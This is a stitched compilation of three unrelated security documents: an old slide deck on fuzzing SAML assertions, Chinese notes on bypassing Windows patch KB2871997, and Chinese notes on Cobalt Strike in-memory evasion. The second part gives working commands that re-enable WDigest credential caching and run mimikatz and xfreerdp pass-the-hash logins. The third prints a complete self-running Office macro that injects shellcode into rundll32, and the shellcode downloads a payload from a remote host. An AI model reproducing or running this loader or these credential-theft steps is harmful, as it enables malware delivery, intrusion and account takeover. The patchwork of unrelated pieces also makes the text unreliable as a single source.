took place previously 15 COPYRIGHT ©2006 McAfee Inc. SSO pull scenario Authentication Authority + Attribute Authority Web User Source Web Site Destination Web Site Policy Decision Point + Policy Enforcement Point Authenticate (out of band) Access inter-site transfer URL Redirect with artifact Get assertion consumer URL Request referenced assertion Supply referenced assertion Provide or refuse destination resource (out of band) 16 COPYRIGHT ©2006 McAfee Inc. Our Scenario ACME.com SiteB.com 17 COPYRIGHT ©2006 McAfee Inc. Login POST https://www.acme.com/app/loginSubmit.jspx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: https://www.acme.com/app/login.jspx Accept-Language: en-us Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Paros/3.2.10 Host: www.acme.com Content-Length: 118 Connection: Keep-Alive Cache-Control: no-cache referer=&userName=ymchen&password=ymchen&x=16&y=9 18 COPYRIGHT ©2006 McAfee Inc. Login Response (Set-Cookie) HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache,no-store,max-age=0 Pragma: No-cache Content-Type: text/html Expires: Thu, 01 Jan 1970 00:00:00 GMT Location: https://www.acme.com/app/welcome.jspx Set-Cookie: JSESSIONID=Gkfbl3YJ9MBdxzVLkRtPpXkYD6gMQkCQMCJVz3dYld 7kPcdJG1LJ!239153226; path=/ Date: Sat, 15 Jul 2006 23:17:15 GMT Connection: close 19 COPYRIGHT ©2006 McAfee Inc. Get SAML Assertion from ACME.com for SiteB GET https://www.acme.com/app/loginToSiteB.jspx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Cookie: CP=null*; JSESSIONID=Gkfbl3YJ9MBdxzVLkRtPpXkYD6gMQkCQMCJVz3dYld 7kPcdJG1LJ!239153226 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Paros/3.2.10 Host: www.acme.com Connection: Keep-Alive Accept-Language: en-us Content-length: 0 Using ONLY JSESSIONID to get SAML Assertion 20 COPYRIGHT ©2006 McAfee Inc. Response from ACME.com <form name="samlform" action="https://www.siteb.com/actionb.dll?cmd=sson&pid=1234 5" method="POST"> <input type="hidden" name="SAMLResponse" id="SAMLResponse" value=“Base64 Encoded SAML Response”> </form> 21 COPYRIGHT ©2006 McAfee Inc. SAML Response -- Header <Response xmlns="urn:oasis:names:tc:SAML:1.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:1.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:1.0:protocol" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" IssueInstant="2006-06-29T23:23:20.559Z" MajorVersion="1" MinorVersion="1" Recipient="https://www.siteb.com/actionb.dll?cmd=sson&amp; pid=12345" ResponseID="_c875208d11f9daa014770c0cf7812418"> 22 COPYRIGHT ©2006 McAfee Inc. SAML Response -- Digital Signature <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc- c14n#"></ds:CanonicalizationMethod> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod> <ds:Reference URI="#_c875208d11f9daa014770c0cf7812418"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="code ds kind rw saml samlp typens #default xsd xsi"></ec:InclusiveNamespaces></ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod> <ds:DigestValue>QNVCOOOsXzCDyl2mp6wZGhUBUCI=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue> SgT0UDeIhUk2KYPk/N6TA2STerwDOTL/4paQ39odRhbngUwzfCizJwLCvZKHCqCwSY3btv9aj/kz 1i0180VCnpMtytVR0UWWM8kzRf1AuPEB3gm5gCZkX1zp/UOnWyEkpdSRNGSquFilrMt9q7JoE7Cq QjR1uDqdBwPsOGlmkcw= </ds:SignatureValue> </ds:Signature> 23 COPYRIGHT ©2006 McAfee Inc. SAML Response – Status <Status><StatusCode Value="samlp:Success"></StatusCode></Status> <Assertion xmlns="urn:oasis:names:tc:SAML:1.0:assertion" AssertionID="_b3360dd260d9c4f7215554869a12044c" IssueInstant="2006-06-29T23:23:20.559Z" Issuer="http://www.acme.com" MajorVersion="1" MinorVersion="1"> 24 COPYRIGHT ©2006 McAfee Inc. SAML Response -- Condition <AuthenticationStatement AuthenticationInstant="2006-06- 29T23:23:20.559Z" AuthenticationMethod="urn:oasis:names:tc:SAML:1.0:am:password"> <Conditions NotBefore="2006-06-29T23:23:20.559Z" NotOnOrAfter="2006-06-29T23:28:20.559Z"> <AudienceRestrictionCondition> <Audience>http://www.siteb.com</Audience> </AudienceRestrictionCondition> </Conditions> This SAML Assertion is only valid for 5 minutes!!! 25 COPYRIGHT ©2006 McAfee Inc. SAML Response -- Subject <Subject> <NameIdentifier>123456789054321</NameIdentifier> <SubjectConfirmation> <ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer</Confir mationMethod> </SubjectConfirmation> </Subject> <SubjectLocality IPAddress=""> </SubjectLocality> </AuthenticationStatement> 26 COPYRIGHT ©2006 McAfee Inc. SAML Response -- Attributes <AttributeStatement> <Subject> <NameIdentifier>123456789054321</NameIdentifier> <SubjectConfirmation> <ConfirmationMethod>urn:oasis:names:tc:SAML:1.0:cm:bearer </ConfirmationMethod> </SubjectConfirmation> </Subject> <Attribute AttributeName="member_id" AttributeNamespace="urn:oasis:names:tc:SAML:1.0:assertion"> <AttributeValue>123456789054321</AttributeValue> </Attribute> </AttributeStatement> </Assertion> </Response> 27 COPYRIGHT ©2006 McAfee Inc. Posting SAML Response POST https://www.siteb.com/actionb.dll?cmd=sson&pid=12345 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: https://www.acme.com/app/loginToSiteB.jspx Content-Type: application/x-www-form-urlencoded Host: www.siteb.com Connection: Keep-Alive Cache-Control: no-cache SAMLResponse=<Base64 encoded> 28 COPYRIGHT ©2006 McAfee Inc. Response from SiteB HTTP/1.1 200 Ok Server: Microsoft-IIS/5.0 Date: Thu, 29 Jun 2006 23:23:58 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Connection: close Set-Cookie: RID=BLAHBLAH; path=/ Content-Type: text/html Content-length: 12345 29 COPYRIGHT ©2006 McAfee Inc. Implementation » Read the XML File » Parse all elements and attributes » Put in attack patterns » Results and problems 30 COPYRIGHT ©2006 McAfee Inc. Read XML File » Save the base 64 decoded file as an XML file » Using System.XML to read the XML file like this: – XmlReader reader = XmlReader.Create(filename, settings); – Other ways like DOM or DataSet can be used too » Determine NodeType (Element or Attribute) 31 COPYRIGHT ©2006 McAfee Inc. Attack Patterns » Only buffer overflow was tested. » Patterns like ‘Z’ x 1024, ‘Z’ x 4096 or random data pattern » After you generate the XML file, – Base 64 encode – Generate HTTP POST request » File name convention – <element>-<attribute>-<test>.xml – E.g.: ds:Signature-value-50k.xml » Coverages – 15 elements and their attributes – Hundreds of test cases 32 COPYRIGHT ©2006 McAfee Inc. Issues » How do we determine results automatically? » By three conditions: – Comparing HTTP Response Code from the server – Comparing HTTP Response Content-Length header – Time out (in case the server died) » Looking for anomolies (like an IDS) – Send normal request first – Send test case to compare results 33 COPYRIGHT ©2006 McAfee Inc. Results » We found one buffer overflow: – <ds:Signature> – The program did not handle the signature verification correctly, therefore when you feed a large amount of data, it crashed. » Flawfinder found 29 potential problems on OpenSAML – Our test application was ‘based’ on OpenSAML implementation – We can’t test what we don’t see! 34 COPYRIGHT ©2006 McAfee Inc. Future Works » Need to add more attack – XPATH Injection – XML memory corruption test – Authorization test • If you have another user’s account, can you become that user? » Need to correlate with source code review results – Can you ‘prove’/’disprove’ flawfinder’s result? » Can similar tests been done in unit testing? – Even earlier, in TDD » We have not touched the backend process part 35 COPYRIGHT ©2006 McAfee Inc. Reference » PROTOS -- http://www.ee.oulu.fi/research/ouspg/protos/ » SAML -- http://www.oasis- open.org/committees/tc_home.php?wg_abbrev=security » OPENSAML – http://www.opensaml.org/ COPYRIGHT ©2006 McAfee Inc. » Question & Answer Thank You! Yen-Ming Chen ychen@foundstone.com
Bypass KB2871997 0x01 KB2871997 1 2014513 2 2014 7 8 (CredSSP) 2973351 Microsoft 2919355 Windows 2975625 Microsoft 2919355 Windows 2014 9 9 2982378 Microsoft : Windows 7 Windows Server 2008 R2 2014 10 14 2984972 Windows 7 Windows Server 2008 R2 2984976 2592687 8.0 Windows 7 Windows Server 2008 R2 2984976 2984972 2984981 2830477 8.1 Windows 7 Windows Server 2008 R2 2984981 2984972 2973501 Windows 8Windows Server 2012 Windows RT 0x02 TokenLeakDetectDelaySecs 1 Win7Win8 1 TokenLeakDetectDelaySecs 2 WDigest 1 2 2 dword 30 30 3 3126593 (MS16-014) 3126593 TokenLeakDetectDelaySecs 0 0x03 WDigest 1 Wdigest WDigest UseLogonCredential UseLogonCredential 0WDigest 1 2Bypass KB2871997 Win7Server 2008 R2Windows 8 Server 2012 UseLogonCredential 1 Windows 8.1 Server 2012 R2 ( ,UseLogonCredential 0 WDigest UseLogonCredential 1 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDela ySecs 1 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDige st 1 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 1 0x04 KB2871997 1SID whoami /priv SID reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 1 rundll32.exe user32.dll LockWorkStation 1 #include<windows.h> int main(){ LockWorkStation(); return 0; } 1 2 3 4 5 //cs desktop [explorer pid] x86|x64 low|high //msf migrate [explorer pid] screenshot 1 2 3 4 5 6 S-1-5-113: NT AUTHORITY\Local S-1-5-114: NT AUTHORITY\Local 1 2 SID S-1-5-113 S-1-5-114 Administrators 114 113 SID """ “/ 2Restricted Admin RDP Overpass-the-hash) Restricted Admin RDP Client Windows 8.1 Windows Server 2012 R2 Windows 7 Windows Server 2008 R2 KB2871997KB2973351 Restricted Admin mode (2) 13126593 2 (DisableRestrictedAdmin 0 1 ) Restricted Admin mod RDP Restricted Admin mode Pass the Hash with Remote Desktop Restricted Admin mode Windows Pass The Hash (Pass the Hash with Remote Desktop) Server Restricted Admin modeClient Restricted Admin mode mimikatz pth attack mimikatz pth (Pass The Hash), Overpass-the-hash "Pass-the-Key" reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 1 mstsc.exe /restrictedadmin 1 privilege::debug sekurlsa::pth /user:d4rksec /domain: /ntlm:5a60baa90ab348a171ef29426a0a98df "/run:mstsc.exe /restrictedadmin" 1 2 . xfreerdp Bypass Restricted Admin Mode () 0x05 1UAC UAC 1UACAdministrators 2fulladministrator 3AccessTokenUAC 4 RID 500 administrator UAC FilterAdministratorToken Server 2008 Disable(),RID500 FilterAdministratorToken 1 administrator xfreerdp /u:administrator /p:p3ssw0rd /v: /cert-ignore xfreerdp /u:administrator /p:5a60baa90ab348a171ef29426a0a98df /v: /cert-ignore 1 2 3 Server RDP Restricted Admin mod Overpass-the-Hash LocalAccountTokenFilterPolicy UAC LocalAccountTokenFilterPolicy 1 0 LocalAccountTokenFilterPolicy 0 ) reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 00000001 /f 1 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 00000000 /f 1 sekurlsa::pth /domain: /user:administrator /ntlm:5a60baa90ab348a171ef29426a0a98df "/run:mstsc.exe /restrictedadmin" 1 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 00000001 /f 1 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 00000000 /f 1 0x06 https://support.microsoft.com/zh-cn/help/2871997/microsoft-security-advisory-update-to-improv e-credentials-protection-a https://support.microsoft.com/zh-cn/help/4488256/how-to-block-remote-use-of-local-accounts-in -windows https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997 https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-t o-improve-credentials-pro https://docs.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard
我的CS笔记之- In-memory Evasion 2 0x01 前言 内存逃逸的第二部分主要是作者讲诉CS的Payload的一个完整执行流程,这个对理解CS植入体非常重 要,对后面做免杀、规避都起到很大作用。第一部分讲侦测手法、第二部分讲自身运行流程,真的是知 己知彼。这一部分作者先讲诉了Stager是什么?然后讲述一个分段加载Payload的完整执行流程,接着 就是不分段加载,最后作者讲了进程注入相关技术在CS中的应用。 0x02 分阶段payload和不分阶段payload 关于分不分阶段,使用过CS的小伙伴应该都很清楚了,但是里面的具体细节,相信很多小伙伴也是一知 半解。下面就详细说下分阶段Payload。 分阶段的payload在进程中执行的流程: 1. 申请一个块儿内存(allocate memory) 2. 复制Stager去这一块儿内存里 3. 创建一个线程,运行这个Stager 4. 这个Stager会再次申请一块儿内存(allocate memory) 5. Stager去下载加密的payload,写入申请的内存中 6. Stager把执行流程转递给这个加密的payload 7. 加密的payload自解密成Reflective DLL 8. 然后把执行流程传递给Reflective DLL 9. Reflective DLL 申请一个块儿内存(allocate memory) 10. 然后初始化自己在新的内存里面 11. 最后reflective DLL 调用payload的入口点函数 这就是一个分阶段的payload的完整加载流程,如果你细细思考,里面存在一个问题,就是第7步被加密 的payload怎么自解密?实际情况是这个所谓的被加密的payload分为2部分,一部分是解密程序,这个 是不加密的,然后才是被加密的反射dll,也就是Beacon.dll。 从1-3是我们loader的执行,3-6是Stager在内存中的执行,7-8是加密payload的执行,9-11是反射DLL 的执行。 我们通过CS生成一个macro样本loader,直观的感受下: loader Private Type PROCESS_INFORMATION   hProcess As Long   hThread As Long   dwProcessId As Long   dwThreadId As Long End Type Private Type STARTUPINFO   cb As Long   lpReserved As String   lpDesktop As String   lpTitle As String   dwX As Long   dwY As Long   dwXSize As Long   dwYSize As Long Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 1 / 7 - Welcome to www.red-team.cn   dwXCountChars As Long   dwYCountChars As Long   dwFillAttribute As Long   dwFlags As Long   wShowWindow As Integer   cbReserved2 As Integer   lpReserved2 As Long   hStdInput As Long   hStdOutput As Long   hStdError As Long End Type #If VBA7 Then   Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr   Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr   Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr   Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long #Else   Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long   Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long   Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long   Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long #End If Sub Auto_Open()   Dim myByte As Long, myArray As Variant, offset As Long   Dim pInfo As PROCESS_INFORMATION   Dim sInfo As STARTUPINFO   Dim sNull As String   Dim sProc As String #If VBA7 Then   Dim rwxpage As LongPtr, res As LongPtr #Else Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 2 / 7 - Welcome to www.red-team.cn   Dim rwxpage As Long, res As Long #End If   myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20, -117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _ 13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1 ,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _ -42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30, 88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _ -117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,1 04,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _ -43,-24,0,0,0,0,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-92,0,0,0,91,4 9,-55,81,81,106,3,81,81,104,-69,1,0,0,83, _ 80,104,87,-119,-97,-58,-1,-43,80,-23,-116,0,0,0,91,49,-46,82,104,0,50,-64,-124,8 2,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61, _ 80,104,-128,51,0,0,-119,-32,106,4,80,106,31,86,104,117,70,-98,-122,-1,-43,95,49, -1,87,87,106,-1,83,86,104,45,6,24,123,-1,-43,-123,-64,15, _ -124,-54,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119 ,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104, _ -73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,117,7,88,80,-23,123,-1,-1,-1,49,-1,-23, -111,1,0,0,-23,-55,1,0,0,-24,111,-1,-1,-1,47, _ 51,76,114,107,0,-109,-91,-125,30,-110,69,-22,-15,61,-39,25,45,22,28,-86,75,-98,- 50,89,-113,112,46,-124,28,53,96,27,-98,111,65,105,-36,-127,85,-18, _ 34,1,86,46,84,-52,-79,-4,71,-47,74,-83,59,-113,59,-124,119,-8,49,-116,44,-127,11 2,17,19,19,75,28,-112,75,91,-26,80,15,-122,25,96,-98,0,85, _ 115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,52,46,48,32 ,40,99,111,109,112,97,116,105,98,108,101,59,32,77,83,73,69, _ 32,55,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,53,46,49,59,32,46,78,69 ,84,32,67,76,82,32,49,46,49,46,52,51,50,50,41, _ 13,10,0,84,-98,-33,90,-46,51,-110,12,-47,40,-16,-113,18,-41,62,98,67,65,-96,-54, -95,-100,-77,-10,-98,-51,-47,5,-116,122,41,51,-104,-6,-67,-3,-52, _ 37,125,-41,-96,-58,85,-68,23,-36,110,-4,-43,-118,-16,-89,-112,110,127,19,3,-79,- 84,46,126,114,-83,89,-118,82,98,12,97,41,-10,-81,4,34,-12,-77,16, _ -94,12,71,-113,106,57,-119,87,-44,11,1,-43,-21,82,66,22,-16,-89,56,-106,-3,110,6 4,-112,121,-41,86,28,28,63,-7,-58,-95,-90,16,82,-10,-112,-95,-103, _ -26,-37,98,124,-69,-113,97,-2,-103,56,-29,-31,-47,0,55,29,-25,-66,-73,-24,87,119 ,53,74,82,85,-4,117,-28,-113,19,17,61,54,103,-64,8,96,-58,-40, _ -29,91,25,-76,-58,-49,13,-35,124,79,88,-70,85,18,31,-103,67,9,-94,-5,64,62,127,1 3,-13,27,-106,-9,-35,69,-80,-25,95,52,56,81,-41,70,94,40, _ 102,70,-123,103,99,88,109,52,24,-108,100,-36,-122,-94,30,28,-113,-48,-22,29,97,5 ,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0, _ 64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0, 32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116, _ -58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-119,-3,-1,-1,49,57,50,46,49,54,56, 46,49,46,52,49,0,1,-55,-61,127)   If Len(Environ("ProgramW6432")) > 0 Then       sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"   Else       sProc = Environ("windir") & "\\System32\\rundll32.exe"   End If   res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)   rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)   For offset = LBound(myArray) To UBound(myArray)       myByte = myArray(offset)       res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&) Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 3 / 7 - Welcome to www.red-team.cn 这就是1-3步的loader,它启动了一个rundll32.exe的进程,然后在进程中申请了一块内存,并复制 Stager,进入内存,然后创建线程执行Stager。 Stager就是其中的myArray:   Next offset   res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) End Sub Sub AutoOpen()   Auto_Open End Sub Sub Workbook_Open()   Auto_Open End Sub -4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,1 14,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _ 13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1 ,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _ -42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30, 88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _ -117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,1 04,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _ -43,-24,0,0,0,0,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-92,0,0,0,91,4 9,-55,81,81,106,3,81,81,104,-69,1,0,0,83, _ 80,104,87,-119,-97,-58,-1,-43,80,-23,-116,0,0,0,91,49,-46,82,104,0,50,-64,-124,8 2,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61, _ 80,104,-128,51,0,0,-119,-32,106,4,80,106,31,86,104,117,70,-98,-122,-1,-43,95,49, -1,87,87,106,-1,83,86,104,45,6,24,123,-1,-43,-123,-64,15, _ -124,-54,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119 ,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104, _ -73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,117,7,88,80,-23,123,-1,-1,-1,49,-1,-23, -111,1,0,0,-23,-55,1,0,0,-24,111,-1,-1,-1,47, _ 51,76,114,107,0,-109,-91,-125,30,-110,69,-22,-15,61,-39,25,45,22,28,-86,75,-98,- 50,89,-113,112,46,-124,28,53,96,27,-98,111,65,105,-36,-127,85,-18, _ 34,1,86,46,84,-52,-79,-4,71,-47,74,-83,59,-113,59,-124,119,-8,49,-116,44,-127,11 2,17,19,19,75,28,-112,75,91,-26,80,15,-122,25,96,-98,0,85, _ 115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,52,46,48,32 ,40,99,111,109,112,97,116,105,98,108,101,59,32,77,83,73,69, _ 32,55,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,53,46,49,59,32,46,78,69 ,84,32,67,76,82,32,49,46,49,46,52,51,50,50,41, _ 13,10,0,84,-98,-33,90,-46,51,-110,12,-47,40,-16,-113,18,-41,62,98,67,65,-96,-54, -95,-100,-77,-10,-98,-51,-47,5,-116,122,41,51,-104,-6,-67,-3,-52, _ 37,125,-41,-96,-58,85,-68,23,-36,110,-4,-43,-118,-16,-89,-112,110,127,19,3,-79,- 84,46,126,114,-83,89,-118,82,98,12,97,41,-10,-81,4,34,-12,-77,16, _ -94,12,71,-113,106,57,-119,87,-44,11,1,-43,-21,82,66,22,-16,-89,56,-106,-3,110,6 4,-112,121,-41,86,28,28,63,-7,-58,-95,-90,16,82,-10,-112,-95,-103, _ -26,-37,98,124,-69,-113,97,-2,-103,56,-29,-31,-47,0,55,29,-25,-66,-73,-24,87,119 ,53,74,82,85,-4,117,-28,-113,19,17,61,54,103,-64,8,96,-58,-40, _ -29,91,25,-76,-58,-49,13,-35,124,79,88,-70,85,18,31,-103,67,9,-94,-5,64,62,127,1 3,-13,27,-106,-9,-35,69,-80,-25,95,52,56,81,-41,70,94,40, _ 102,70,-123,103,99,88,109,52,24,-108,100,-36,-122,-94,30,28,-113,-48,-22,29,97,5 ,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0, _ 64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0, 32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116, _ Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 4 / 7 - Welcome to www.red-team.cn 这是一段shellcode,就是http协议的下载者,和msf是一样的,使用的是HD moore(msf创始人之 一,比特币早期持有者,羡慕死了)写的shellcode,也就是这个汇编代码https://github.com/rapid7/ metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reve rse_http.asm 3-6步执行的就是如上的Stager,7-8步时执行的加密的payload,前面说了这个所谓的加密payload,分 为加密部分和不加密部分。加密部分使用xor亦或,加密的是Beacon.dll,具体代码在CS的 XorEncoder.java中,小伙伴可以自己阅读下。以前CS使用单字节加密,很容易被yara给解密了,后面 使用了多字节。不加密部分就是一段解密Xor代码,也是汇编代码,感兴趣的小伙伴到视频的13:20秒去 阅读下。 最后9-11步时反射DLL的执行,这个代码也是开源的https://github.com/stephenfewer/ReflectiveDLLI njection。这就是分段加载payload的加载细节。我们通过process hacker去查看内存,就会发现3个可 读可写可执行的内存,对应上了我们上面步骤中3次的内存申请,4k的是stager、4096k的是加密 payload、268k的是反射dll。 这是分段的,那么不分段的呢? 1. 申请一个块儿内存(allocate memory) 2. 复制Stager去这一块儿内存里 3. 创建一个线程,运行这个Stager 4. 这个Stager会再次申请一块儿内存 5. Stager去下载加密的payload,写入申请的内存中 6. Stager把执行流程转递给这个加密的payload 7. 加密的payload自解密成Reflective DLL -58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-119,-3,-1,-1,49,57,50,46,49,54,56, 46,49,46,52,49,0,1,-55,-61,127 Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 5 / 7 - Welcome to www.red-team.cn 8. 然后把执行流程传递给Reflective DLL 9. Reflective DLL 申请一个块儿内存 10. 然后初始化自己在新的内存里面 11. 最后reflective DLL 调用payload的入口点函数 Stage = Relective DLL 不分阶段比分阶段少了很多内存操作流程,也就少调用了很多API,因此比较OPSEC,作者给了一张CS 中Artifact(loader)的行为图: 在不分阶段的Payload的执行步骤中,我们可以看出1-3其实就是Artifact Kit/Resource Kit可以自定义 的,9-11还是我们不太能控制的,我,希望CS早日开放这块儿的控制。 0x02 进程注入在CS中的应用 进程注入这个流程玩CS的小伙伴应该倒背如流了,打开远程进程->分配内存,复制程序去内存->创建线程 执行。这个是经典注入,CS也使用了Process hollowing技术,详细的技术阅读@idiotc4t同学的这篇文 章https://idiotc4t.com/code-and-dll-process-injection/process-hollowing。CS使用的process hollowing略有区别,作者称为丐版Process hollowing,流程是,打开远程进程->分配内存,复制程序去 内存->劫持存在的线程运行程序(有人叫线程劫持,不管叫什么,知道技术原理最重要)。 Process hollowing 比经典注入更加OPSEC,对比如图: Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 6 / 7 - Welcome to www.red-team.cn 0x03 总结 In-memory Evasion 2 主要讲诉的还是A payload's life。梳理清楚payload在内存中的执行流程的每个 